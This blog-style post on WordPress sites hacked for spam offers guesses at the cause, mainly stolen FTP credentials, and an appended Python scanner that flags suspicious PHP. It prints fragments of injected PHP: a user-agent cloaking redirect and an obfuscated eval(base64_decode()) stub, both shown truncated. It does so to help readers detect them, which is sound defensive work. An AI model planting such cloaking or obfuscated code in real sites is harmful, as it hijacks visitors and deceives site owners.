Unless these spammers have figured out a way to beat WordPress’s nonces, they didn’t use the AskApache Password Protection Plugin to do it. And as the author of that plugin, I know these exploits very well indeed, having studied hundreds and thousands of them on honeypots and in server logs, which is how I came up with the anti-hacking htaccess rules that supplement the authentication aspect.
From what I’ve been able to gather, the exploit most likely occurred from an insecure WordPress plugin, an insecure CMS (Joomla, Xoops, etc.), that you had, or from someone stealing your ftp login info, which shouldn’t happen because DH supplies encrypted transports (sftp, ssh, etc.)… all it takes is one unencrypted mistake, or just downloading 1 trojan or being infected by 1 malicious website with a 0 day on it.
Here’s some example ‘exploit’ code…
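// Cloaking check: only visitors whose User-Agent contains "google" are redirected
$agent = $_SERVER['HTTP_USER_AGENT'];
if (eregi("google", $agent)) {
    header("HTTP/1.1 301");
    header("Location: http://ba");
    exit();
}
// Same kind of redirect stub, hidden from a plain-text search by base64
eval(base64_decode('naSgiZ29vKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxvY2F0aW9
uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));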
So search your site files for ‘base64_decode’, ‘eval’, ‘header’, ‘301’, etc…
I agree that compromised FTP accounts are the most likely culprit. Although it is possible that someone has written code that is able to bypass a webhosting company’s internal security to reach the stored passwords, it’s unlikely because they would eventually go out of business if they were that awful.
Many webhosting companies use those easy webftp type scripts and use them in their cpanels and various user-login areas; these scripts often verify the username and password by checking a database, usually MySQL. So that is more likely than an AI-trojan running around undetected. Access to a MySQL database of passwords would only be noticed if they were actively checking for that.
Otherwise the loss of the ftp account info could happen anywhere upstream of your connection if you are not using sftp. My guess is they have access to a webhosting company’s MySQL database, maybe they got lucky with their greeting card trojans and got a staff member’s computer infected and found it that way. Once they have ftp access to your account they can find other passwords and usernames you are associated with by looking at your config files, that’s where it can start to be more AI… they seem pretty dumb though, so I doubt it.
All you can do if you are in this position is continually bug your hosting support until they fix it. A crime is being committed and they do have certain legal obligations to at least try and prevent this from happening.
Even the .htaccess security trick I outlined here won’t work if your host is to blame… but DH is for the most part still Linux people, and they know their stuff.
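Added example, not part of the original post: one way to run the file search the post recommends, flagging `eval(base64_decode(...))` and the user-agent/redirect strings and decoding the payload for reading only. The function names, the rule names, the file suffix list and the sample files are assumptions made for this illustration.

```python
import base64, binascii, re, tempfile
from pathlib import Path

# eval(base64_decode('...')): the literal may wrap across lines, as in the post.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1", re.I)
# Other strings the post says to search for (user-agent check, 301/Location header).
INDICATORS = {
    "user_agent_check": re.compile(r"HTTP_USER_AGENT"),
    "redirect_header": re.compile(
        r"header\s*\(\s*['\"](?:Location:|HTTP/1\.[01]\s+30[12])", re.I),
}

def decode_payload(blob):
    """Decode a base64 literal for reading only; the result is never executed."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(cleaned).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan_file(path):
    """Return [(line_number, rule, detail)] for one file, sorted by line."""
    text = Path(path).read_text(errors="replace")
    line_of = lambda m: text.count("\n", 0, m.start()) + 1
    hits = [(line_of(m), "eval_base64", decode_payload(m.group(2)))
            for m in EVAL_B64.finditer(text)]
    for rule, rx in INDICATORS.items():
        hits += [(line_of(m), rule, m.group(0)) for m in rx.finditer(text)]
    return sorted(hits, key=lambda h: h[0])

def scan_tree(root, suffixes=(".php", ".inc", ".phtml")):
    """Return {path: hits} for flagged PHP-like files under root."""
    files = (p for p in sorted(Path(root).rglob("*"))
             if p.is_file() and p.suffix.lower() in suffixes)
    return {str(p): h for p in files if (h := scan_file(p))}

def write_sample(root):
    """Constructed sample: one clean file, one with an injected redirect stub."""
    blob = base64.b64encode(b'header("Location: http://example.invalid/");exit();').decode()
    Path(root, "clean.php").write_text("<?php echo 'hello'; ?>\n")
    body = f"eval(base64_decode('{blob[:30]}\n{blob[30:]}'));\n?>\n"
    Path(root, "index.php").write_text("<?php\n$agent = $_SERVER['HTTP_USER_AGENT'];\n" + body)

if __name__ == "__main__":
    write_sample(root := tempfile.mkdtemp())  # demo on the constructed sample
    for path, hits in scan_tree(root).items():
        print(path, *hits, sep="\n  ")
```

Hits on `HTTP_USER_AGENT` or `header()` alone also occur in legitimate code, so treat them as leads to review; an `eval_base64` hit is the stronger signal.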